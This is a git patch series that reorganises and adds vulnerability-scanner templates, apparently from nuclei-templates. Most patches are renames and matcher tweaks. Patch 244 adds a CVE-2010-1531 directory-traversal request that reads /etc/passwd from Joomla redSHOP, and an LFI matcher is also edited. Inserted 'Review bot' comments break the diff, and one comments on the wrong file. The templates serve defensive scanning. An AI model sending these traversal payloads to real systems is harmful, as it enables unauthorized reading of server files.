Sun, 12 Sep 2021 23:12:16 +0530 Subject: [PATCH 222/339] Rename technologies/default-windows-server-page.yaml to technologies/microsoft/default-windows-server-page.yaml --- technologies/{ => microsoft}/default-windows-server-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/default-windows-server-page.yaml (100%) 
diff --git a/technologies/default-windows-server-page.yaml b/technologies/microsoft/default-windows-server-page.yaml similarity index 100% rename from technologies/default-windows-server-page.yaml rename to technologies/microsoft/default-windows-server-page.yaml From 8a90299591b0540b134c4ff2d02b6847ff3d7716 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:12:30 +0530 Subject: [PATCH 223/339] Rename technologies/microsoft-exchange-server-detect.yaml to technologies/microsoft/microsoft-exchange-server-detect.yaml --- .../{ => microsoft}/microsoft-exchange-server-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => microsoft}/microsoft-exchange-server-detect.yaml (100%) diff --git a/technologies/microsoft-exchange-server-detect.yaml b/technologies/microsoft/microsoft-exchange-server-detect.yaml similarity index 100% rename from technologies/microsoft-exchange-server-detect.yaml rename to technologies/microsoft/microsoft-exchange-server-detect.yaml From 761dff10b2021cb71c4d9f928bca301eff69eb2c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:07 +0530 Subject: [PATCH 224/339] Rename technologies/nginx-linux-page.yaml to technologies/nginx/nginx-linux-page.yaml --- technologies/{ => nginx}/nginx-linux-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/nginx-linux-page.yaml (100%) diff --git a/technologies/nginx-linux-page.yaml b/technologies/nginx/nginx-linux-page.yaml similarity index 100% rename from technologies/nginx-linux-page.yaml rename to technologies/nginx/nginx-linux-page.yaml From 276ae59db8de482790d29f0ef427f4262bf8709d Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:13 +0530 Subject: [PATCH 225/339] Rename technologies/nginx-version.yaml to technologies/nginx/nginx-version.yaml --- technologies/{ => nginx}/nginx-version.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/nginx-version.yaml (100%) diff --git a/technologies/nginx-version.yaml b/technologies/nginx/nginx-version.yaml similarity index 100% rename from technologies/nginx-version.yaml rename to technologies/nginx/nginx-version.yaml From 76c6650c233c5e69df23a400fcecaf573072286f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:13:19 +0530 Subject: [PATCH 226/339] Rename technologies/default-nginx-page.yaml to technologies/nginx/default-nginx-page.yaml --- technologies/{ => nginx}/default-nginx-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => nginx}/default-nginx-page.yaml (100%) diff --git a/technologies/default-nginx-page.yaml b/technologies/nginx/default-nginx-page.yaml similarity index 100% rename from technologies/default-nginx-page.yaml rename to technologies/nginx/default-nginx-page.yaml From 514281db511b73c433f7bbf5674337aaed4b38b9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:11 +0530 Subject: [PATCH 227/339] Rename technologies/oracle-http-server-12c.yaml to technologies/oracle/oracle-http-server-12c.yaml --- technologies/{ => oracle}/oracle-http-server-12c.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/oracle-http-server-12c.yaml (100%) diff --git a/technologies/oracle-http-server-12c.yaml b/technologies/oracle/oracle-http-server-12c.yaml similarity index 100% rename from technologies/oracle-http-server-12c.yaml rename to technologies/oracle/oracle-http-server-12c.yaml From 7e10e338d863004c6c9e173f461e68562e8250f3 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:19 +0530 Subject: [PATCH 228/339] Rename technologies/oracle-iplanet-web-server.yaml to technologies/oracle/oracle-iplanet-web-server.yaml --- technologies/{ => oracle}/oracle-iplanet-web-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => oracle}/oracle-iplanet-web-server.yaml (91%) diff --git a/technologies/oracle-iplanet-web-server.yaml b/technologies/oracle/oracle-iplanet-web-server.yaml similarity index 91% rename from technologies/oracle-iplanet-web-server.yaml rename to technologies/oracle/oracle-iplanet-web-server.yaml index 12d06c6232..6d080503e1 100644 --- a/technologies/oracle-iplanet-web-server.yaml +++ b/technologies/oracle/oracle-iplanet-web-server.yaml @@ -22,4 +22,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 6c4d6a5abbd5e0561b1b20dc67ef90184a7397f7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:14:25 +0530 Subject: [PATCH 229/339] Rename technologies/default-oracle-application-page.yaml to technologies/oracle/default-oracle-application-page.yaml --- technologies/{ => oracle}/default-oracle-application-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => oracle}/default-oracle-application-page.yaml (100%) diff --git a/technologies/default-oracle-application-page.yaml b/technologies/oracle/default-oracle-application-page.yaml similarity index 100% rename from technologies/default-oracle-application-page.yaml rename to technologies/oracle/default-oracle-application-page.yaml From c03dcd01784ae788b340f0a1d7f873ca8241adf0 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha Date: Sun, 12 Sep 2021 23:15:01 +0530 Subject: [PATCH 230/339] Rename technologies/default-tomcat-page.yaml to technologies/apache/default-tomcat-page.yaml --- technologies/{ => apache}/default-tomcat-page.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/default-tomcat-page.yaml (100%) diff --git a/technologies/default-tomcat-page.yaml b/technologies/apache/default-tomcat-page.yaml similarity index 100% rename from technologies/default-tomcat-page.yaml rename to technologies/apache/default-tomcat-page.yaml From 487e5e421645c17c5706ff93f8ce2de5073a501b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:15:10 +0530 Subject: [PATCH 231/339] Rename technologies/tomcat-detect.yaml to technologies/apache/tomcat-detect.yaml --- technologies/{ => apache}/tomcat-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => apache}/tomcat-detect.yaml (100%) diff --git a/technologies/tomcat-detect.yaml b/technologies/apache/tomcat-detect.yaml similarity index 100% rename from technologies/tomcat-detect.yaml rename to technologies/apache/tomcat-detect.yaml From d0bd1bbcee3258dc7d9331e25cd214edfe2656ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:16:20 +0530 Subject: [PATCH 232/339] Rename technologies/kubernetes-version.yaml to technologies/kubernetes/kubernetes-version.yaml --- technologies/{ => kubernetes}/kubernetes-version.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => kubernetes}/kubernetes-version.yaml (100%) diff --git a/technologies/kubernetes-version.yaml b/technologies/kubernetes/kubernetes-version.yaml similarity index 100% rename from technologies/kubernetes-version.yaml rename to technologies/kubernetes/kubernetes-version.yaml From 1849797fea846f94379f2916b322ca288a3dd666 Mon Sep 17 00:00:00 2001 
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:16:27 +0530
Subject: [PATCH 233/339] Rename technologies/kubernetes-mirantis.yaml to technologies/kubernetes/kubernetes-mirantis.yaml
---
 technologies/{ => kubernetes}/kubernetes-mirantis.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename technologies/{ => kubernetes}/kubernetes-mirantis.yaml (91%)
diff --git a/technologies/kubernetes-mirantis.yaml b/technologies/kubernetes/kubernetes-mirantis.yaml
similarity index 91%
rename from technologies/kubernetes-mirantis.yaml
rename to technologies/kubernetes/kubernetes-mirantis.yaml
index 34516924bc..f823c86fb8 100644
--- a/technologies/kubernetes-mirantis.yaml
+++ b/technologies/kubernetes/kubernetes-mirantis.yaml
@@ -22,4 +22,4 @@ requests:
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
From 444e8af25a1ffb8466e0c1b1c5c5eef7685472a6 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:16:33 +0530
Subject: [PATCH 234/339] Rename technologies/kubernetes-enterprise-manager.yaml to technologies/kubernetes/kubernetes-enterprise-manager.yaml
---
 .../{ => kubernetes}/kubernetes-enterprise-manager.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename technologies/{ => kubernetes}/kubernetes-enterprise-manager.yaml (91%)
diff --git a/technologies/kubernetes-enterprise-manager.yaml b/technologies/kubernetes/kubernetes-enterprise-manager.yaml
similarity index 91%
rename from technologies/kubernetes-enterprise-manager.yaml
rename to technologies/kubernetes/kubernetes-enterprise-manager.yaml
index 3a22e2d120..137e4062a7 100644
--- a/technologies/kubernetes-enterprise-manager.yaml
+++ b/technologies/kubernetes/kubernetes-enterprise-manager.yaml
@@ -22,4 +22,4 @@ requests:
 - type: status
 status:
- - 200
\ No newline at end of file
+ - 200
From 5d6ac2f090372b5a4c448cb617b2b8a406a26027 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:17:32 +0530
Subject: [PATCH 235/339] Rename technologies/google-bucket-service.yaml to technologies/google/google-bucket-service.yaml
---
 technologies/{ => google}/google-bucket-service.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename technologies/{ => google}/google-bucket-service.yaml (97%)
diff --git a/technologies/google-bucket-service.yaml b/technologies/google/google-bucket-service.yaml
similarity index 97%
rename from technologies/google-bucket-service.yaml
rename to technologies/google/google-bucket-service.yaml
index f8fe51f476..581c71ab67 100644
--- a/technologies/google-bucket-service.yaml
+++ b/technologies/google/google-bucket-service.yaml
@@ -22,4 +22,4 @@ requests:
 - contains(tolower(all_headers), 'x-goog-stored-content-length')
 - contains(tolower(all_headers), 'x-guploader-uploadid')
 part: header
- condition: or
\ No newline at end of file
+ condition: or
From f5c68c8dcd81922f3aedf4bf76ddb86d5591d35c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:17:39 +0530
Subject: [PATCH 236/339] Rename technologies/google-storage.yaml to technologies/google/google-storage.yaml
---
 technologies/{ => google}/google-storage.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename technologies/{ => google}/google-storage.yaml (93%)
diff --git a/technologies/google-storage.yaml b/technologies/google/google-storage.yaml
similarity index 93%
rename from technologies/google-storage.yaml
rename to technologies/google/google-storage.yaml
index 95963c6a8c..a36c7baded 100644
--- a/technologies/google-storage.yaml
+++ b/technologies/google/google-storage.yaml
@@ -15,4 +15,4 @@ requests:
 words:
 - x-goog-metageneration
 - X-Goog-Metageneration
- part: header
\ No newline at end of file
+ part: header
From c82bced598f9158b50fd09e02fcf50a79012750e Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:19:04 +0530
Subject: [PATCH 237/339] Rename technologies/sql-server-reporting.yaml to technologies/microsoft/sql-server-reporting.yaml
---
 technologies/{ => microsoft}/sql-server-reporting.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename technologies/{ => microsoft}/sql-server-reporting.yaml (100%)
diff --git a/technologies/sql-server-reporting.yaml b/technologies/microsoft/sql-server-reporting.yaml
similarity index 100%
rename from technologies/sql-server-reporting.yaml
rename to technologies/microsoft/sql-server-reporting.yaml
From 53cf6811f46a0937a9bca466da1c81ca759c0dfc Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:21:42 +0530
Subject: [PATCH 238/339] Rename technologies/firebase-detect.yaml to technologies/google/firebase-detect.yaml
---
 technologies/{ => google}/firebase-detect.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename technologies/{ => google}/firebase-detect.yaml (100%)
diff --git a/technologies/firebase-detect.yaml b/technologies/google/firebase-detect.yaml
similarity index 100%
rename from technologies/firebase-detect.yaml
rename to technologies/google/firebase-detect.yaml
From d75199919af504802d0e20edae954f5be8cc9c37 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:21:49 +0530
Subject: [PATCH 239/339] Rename technologies/firebase-urls.yaml to technologies/google/firebase-urls.yaml
---
 technologies/{ => google}/firebase-urls.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename technologies/{ => google}/firebase-urls.yaml (96%)
diff --git a/technologies/firebase-urls.yaml b/technologies/google/firebase-urls.yaml
similarity index 96%
rename from technologies/firebase-urls.yaml
rename to technologies/google/firebase-urls.yaml
index 67a05cefcb..18f0ab9edd 100644
--- a/technologies/firebase-urls.yaml
+++ b/technologies/google/firebase-urls.yaml
@@ -20,4 +20,4 @@ requests:
 - type: regex
 regex:
 - ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?"
- part: body
\ No newline at end of file
+ part: body
From 963f0a7d310a5925cf28b775f7be537edefd853c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:23:22 +0530
Subject: [PATCH 240/339] Rename technologies/aws-bucket-service.yaml to technologies/aws/aws-bucket-service.yaml
---
 technologies/{ => aws}/aws-bucket-service.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename technologies/{ => aws}/aws-bucket-service.yaml (96%)
diff --git a/technologies/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml
similarity index 96%
rename from technologies/aws-bucket-service.yaml
rename to technologies/aws/aws-bucket-service.yaml
index b3eacd8135..ad824b8670 100644
--- a/technologies/aws-bucket-service.yaml
+++ b/technologies/aws/aws-bucket-service.yaml
@@ -26,4 +26,4 @@ requests:
 dsl:
 - contains(tolower(all_headers), 'x-guploader-uploadid')
 part: header
- negative: true
\ No newline at end of file
+ negative: true
From d0dbf4eaf08cf876e3d89aea683b98a43c4dd211 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:23:56 +0530
Subject: [PATCH 241/339] Rename technologies/telerik-dialoghandler-detect.yaml to technologies/telerik/telerik-dialoghandler-detect.yaml
---
 technologies/{ => telerik}/telerik-dialoghandler-detect.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename technologies/{ => telerik}/telerik-dialoghandler-detect.yaml (100%)
diff --git a/technologies/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml
similarity index 100%
rename from technologies/telerik-dialoghandler-detect.yaml
rename to technologies/telerik/telerik-dialoghandler-detect.yaml
From ee5b86d40e3cd130e6869e404304e941b7e5b650 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sun, 12 Sep 2021 23:24:03 +0530
Subject: [PATCH 242/339] Rename technologies/telerik-fileupload-detect.yaml to technologies/telerik/telerik-fileupload-detect.yaml
---
 technologies/{ => telerik}/telerik-fileupload-detect.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename technologies/{ => telerik}/telerik-fileupload-detect.yaml (100%)
diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik/telerik-fileupload-detect.yaml
similarity index 100%
rename from technologies/telerik-fileupload-detect.yaml
rename to technologies/telerik/telerik-fileupload-detect.yaml
From 6814a334ea3e5c61268a68946fffb7e8edeae3e9 Mon Sep 17 00:00:00 2001
From: johnk3r
Date: Sun, 12 Sep 2021 16:31:54 -0300
Subject: [PATCH 243/339] Create totemomail-detect.yaml
---
 exposed-panels/totemomail-detect.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 exposed-panels/totemomail-detect.yaml
diff --git a/exposed-panels/totemomail-detect.yaml b/exposed-panels/totemomail-detect.yaml
new file mode 100644
index 0000000000..0a133f9cb2
--- /dev/null
+++ b/exposed-panels/totemomail-detect.yaml
@@ -0,0 +1,21 @@
+id: totemomail-detect
+
+info:
+ name: Detect totemomail - Secure email communication
+ author: johnk3r
+ severity: info
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/responsiveUI/webmail/folder.xhtml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "totemomail"
+ part: body
+ - type: status
+ status:
+ - 200
From 05d086181c0225598e631482d27d5786dfce3971 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Mon, 13 Sep 2021 07:35:04 +0700
Subject: [PATCH 244/339] Create CVE-2010-1531.yaml
---
 cves/2010/CVE-2010-1531.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/2010/CVE-2010-1531.yaml
diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml
new file mode 100644
index 0000000000..c118f123cd
--- /dev/null
+++ b/cves/2010/CVE-2010-1531.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1531
+
+info:
+ name: Joomla! Component redSHOP 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12054
+ - https://www.cvedetails.com/cve/CVE-2010-1531
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From d48ac960a7c1c4bd8865e4604ba0f300f8fd937c Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:08:30 +0530
Subject: [PATCH 245/339] Rename exposed-panels/ibm-note-login.yaml to exposed-panels/ibm/ibm-note-login.yaml
---
 exposed-panels/{ => ibm}/ibm-note-login.yaml | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename exposed-panels/{ => ibm}/ibm-note-login.yaml (100%)
diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml
similarity index 100%
rename from exposed-panels/ibm-note-login.yaml
rename to exposed-panels/ibm/ibm-note-login.yaml
From 8b117065d5e6bbc2d33b08a0968dc94a31a5fa27 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:08:48 +0530
Subject: [PATCH 246/339] Update ibm-note-login.yaml
---
 exposed-panels/ibm/ibm-note-login.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/exposed-panels/ibm/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml
index a178a6d3b7..8aeaae29fa 100644
--- a/exposed-panels/ibm/ibm-note-login.yaml
+++ b/exposed-panels/ibm/ibm-note-login.yaml
@@ -5,7 +5,7 @@ info:
 author: dhiyaneshDK
 severity: info
 reference: https://www.exploit-db.com/ghdb/7122
- tags: panel
+ tags: panel,ibm
 requests:
 - method: GET
From 96b22ca82ae7ba87f5cf5c33b27dd5cd934a308a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:09:16 +0530
Subject: [PATCH 247/339] Update and rename exposed-panels/ibm-security-access-manager.yaml to exposed-panels/ibm/ibm-security-access-manager.yaml
---
 .../{ => ibm}/ibm-security-access-manager.yaml | 10 ++++------
 1 file changed, 4 insertions(+), 6 deletions(-)
 rename exposed-panels/{ => ibm}/ibm-security-access-manager.yaml (83%)
diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml
similarity index 83%
rename from exposed-panels/ibm-security-access-manager.yaml
rename to exposed-panels/ibm/ibm-security-access-manager.yaml
index 3d2e8aa816..77c728b173 100644
--- a/exposed-panels/ibm-security-access-manager.yaml
+++ b/exposed-panels/ibm/ibm-security-access-manager.yaml
@@ -2,10 +2,11 @@ id: ibm-security-access-manager
 info:
 name: Detects IBM Security Access Manager
- description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.
- reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager
 author: geeknik
 severity: info
+ description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.
+ reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager
+ tags: panel,ibm
 requests:
 - method: GET
@@ -16,11 +17,8 @@ requests:
 matchers:
 - type: word
 words:
- - "IBM Security Access Manager"
- - "<h2>IBM Security"
- - "<em>Access Manager"
+ - "<title>IBM Security Access Manager"
 part: body
- condition: and
 - type: word
 part: header
From dcc3ef533035cba20023c7d0ac45195c33c6b9f3 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:10:25 +0530
Subject: [PATCH 248/339] Update ibm-security-access-manager.yaml
---
 exposed-panels/ibm/ibm-security-access-manager.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/exposed-panels/ibm/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml
index 77c728b173..4d40dab456 100644
--- a/exposed-panels/ibm/ibm-security-access-manager.yaml
+++ b/exposed-panels/ibm/ibm-security-access-manager.yaml
@@ -21,6 +21,6 @@ requests:
 part: body
 - type: word
- part: header
 words:
 - "IBM Security Access Manager for Web"
+ part: header
From 7a3dbb27e29781d85a8698855aac2f7ff9e37ae7 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:26:26 +0530
Subject: [PATCH 249/339] Create totemomail-smtp-detect.yaml
---
 network/totemomail-smtp-detect.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 network/totemomail-smtp-detect.yaml
diff --git a/network/totemomail-smtp-detect.yaml b/network/totemomail-smtp-detect.yaml
new file mode 100644
index 0000000000..7eecf58266
--- /dev/null
+++ b/network/totemomail-smtp-detect.yaml
@@ -0,0 +1,21 @@
+id: totemomail-smtp-detect
+
+info:
+ name: Totemomail SMTP Server Detect
+ author: princechaddha
+ severity: info
+ tags: mail,smtp,network,totemomail
+
+network:
+ - inputs:
+ - data: "\r\n"
+ read-size: 2048
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:25"
+
+ matchers:
+ - type: word
+ words:
+ - "totemomail"
From 546bd6a03870668de2c561545565e1e06a356417 Mon Sep 17 00:00:00 2001
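Review bot: The only matcher in totemomail-smtp-detect.yaml is a case-sensitive word `totemomail` applied to up to 2048 bytes of whatever the service returns after the bare `\r\n`, so a greeting that capitalises the product name would be missed and any unrelated service echoing the string anywhere in its banner would match. If the product names itself in the standard SMTP `220` greeting, a single regex matcher such as `- "(?i)^220.*totemomail"` (or a second word matcher on `220 ` combined with `matchers-condition: and`) pins detection to the greeting line and is case-insensitive; the exact banner format should be confirmed against a real instance before tightening. The `info` block would also benefit from a one-line `description` noting that the template reads the SMTP banner only and sends no commands or credentials.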
From: sandeep
Date: Mon, 13 Sep 2021 15:28:35 +0530
Subject: [PATCH 250/339] matcher update
---
 vulnerabilities/other/bullwark-momentum-lfi.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml
index 96e46cec40..e6f95ebac9 100644
--- a/vulnerabilities/other/bullwark-momentum-lfi.yaml
+++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml
@@ -29,6 +29,6 @@ requests:
 status:
 - 200
- - type: word
- words:
- - "root:"
+ - type: regex
+ regex:
+ - "root:.*:0:0"
\ No newline at end of file
From 19f73e7c2bac4ba014b7affd2e5b1c5d8fd79f71 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:31:03 +0530
Subject: [PATCH 251/339] Update totemomail-detect.yaml
---
 exposed-panels/totemomail-detect.yaml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/exposed-panels/totemomail-detect.yaml b/exposed-panels/totemomail-detect.yaml
index 0a133f9cb2..dd29136211 100644
--- a/exposed-panels/totemomail-detect.yaml
+++ b/exposed-panels/totemomail-detect.yaml
@@ -4,6 +4,7 @@ info:
 name: Detect totemomail - Secure email communication
 author: johnk3r
 severity: info
+ tags: totemomail,panel
 requests:
 - method: GET
@@ -14,8 +15,9 @@ requests:
 matchers:
 - type: word
 words:
- - "totemomail"
+ - "WebMail login: totemomail® WebMail"
 part: body
+
 - type: status
 status:
 - 200
From e18cc1421825172f8fded246be2c39bbdf65549f Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:34:18 +0530
Subject: [PATCH 252/339] Update bullwark-momentum-lfi.yaml
---
 vulnerabilities/other/bullwark-momentum-lfi.yaml | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml
index e6f95ebac9..be615bacc1 100644
--- a/vulnerabilities/other/bullwark-momentum-lfi.yaml
+++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml
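Review bot: The tightened word matcher `"WebMail login: totemomail® WebMail"` in the second hunk of totemomail-detect.yaml only fires if the page emits the registered-trademark sign as a raw UTF-8 character; if a deployment serves it as an HTML entity (`&reg;` / `&#174;`) or the title differs by locale, the template silently reports nothing. Anchoring on the ASCII prefix, `- "WebMail login: totemomail"`, keeps the precision gained over the previous bare `totemomail` while avoiding the encoding dependency; if the full title is kept deliberately, a comment such as `# title is emitted as raw UTF-8 on the reference install` would record the assumption. The enclosing `requests:` block starts outside the hunk, so the governing `matchers-condition` is not visible here.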
@@ -4,12 +4,11 @@ info:
 name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal
 author: pikpikcu
 severity: high
- tags: bullwark,lfi
 reference:
 - https://www.exploit-db.com/exploits/47773
 - http://www.bullwark.net/ # vendor homepage
 - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
-
+ tags: bullwark,lfi
 additional-fields:
 version: Bullwark Momentum Series Web Server JAWS/1.0
 shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1
@@ -31,4 +30,4 @@ requests:
 - type: regex
 regex:
- - "root:.*:0:0"
\ No newline at end of file
+ - "root:.*:0:0"
From 18879698fa2755739945369b88750d7db9c87831 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 13 Sep 2021 15:55:14 +0530
Subject: [PATCH 253/339] Update bullwark-momentum-lfi.yaml
---
 vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml
index be615bacc1..a6424a4b88 100644
--- a/vulnerabilities/other/bullwark-momentum-lfi.yaml
+++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml
@@ -8,11 +8,11 @@ info:
 - https://www.exploit-db.com/exploits/47773
 - http://www.bullwark.net/ # vendor homepage
 - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
- tags: bullwark,lfi
 additional-fields:
 version: Bullwark Momentum Series Web Server JAWS/1.0
 shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1
 fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D
+ tags: bullwark,lfi
 requests:
 - raw:
From 12b42bd029ff05ebad24ab64e01cb0438473ebec Mon Sep 17 00:00:00 2001
From: sandeep
Date: Mon, 13 Sep 2021 23:33:03 +0530
Subject: [PATCH 254/339] misc update
---
 .../{weblogic-default-login.yaml => weblogic-weak-login.yaml} | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename default-logins/weblogic/{weblogic-default-login.yaml => weblogic-weak-login.yaml} (91%)
diff --git a/default-logins/weblogic/weblogic-default-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml
similarity index 91%
rename from default-logins/weblogic/weblogic-default-login.yaml
rename to default-logins/weblogic/weblogic-weak-login.yaml
index 310ae8dbb3..e49f60202c 100644
--- a/default-logins/weblogic/weblogic-default-login.yaml
+++ b/default-logins/weblogic/weblogic-weak-login.yaml
@@ -1,7 +1,7 @@
-id: weblogic-default-login
+id: weblogic-weak-login
 info:
- name: WebLogic default login
+ name: WebLogic weak login
 author: pdteam
 severity: high
 tags: default-login,weblogic
From 7e69bb8d9fdc14198fa40df4c06dc7cca485fd1a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Tue, 14 Sep 2021 00:11:45 +0530
Subject: [PATCH 255/339] Update ibm-security-access-manager.yaml
---
 exposed-panels/ibm/ibm-security-access-manager.yaml | 7 +++++++
 1 file changed, 7 insertions(+)
diff --git a/exposed-panels/ibm/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml
index 4d40dab456..ee25284a26 100644
--- a/exposed-panels/ibm/ibm-security-access-manager.yaml
+++ b/exposed-panels/ibm/ibm-security-access-manager.yaml
@@ -24,3 +24,10 @@ requests:
 words:
 - "IBM Security Access Manager for Web"
 part: header
+
+ - type: word
+ words:
+ - "/mga/sps/authsvc/policy/forgot_username"
+ - "/mga/sps/authsvc/policy/forgot_password"
+ part: body
+ condition: and
From acbb038e016d0b9feef502299c074950d27e4c0c Mon Sep 17 00:00:00 2001
From: sandeep
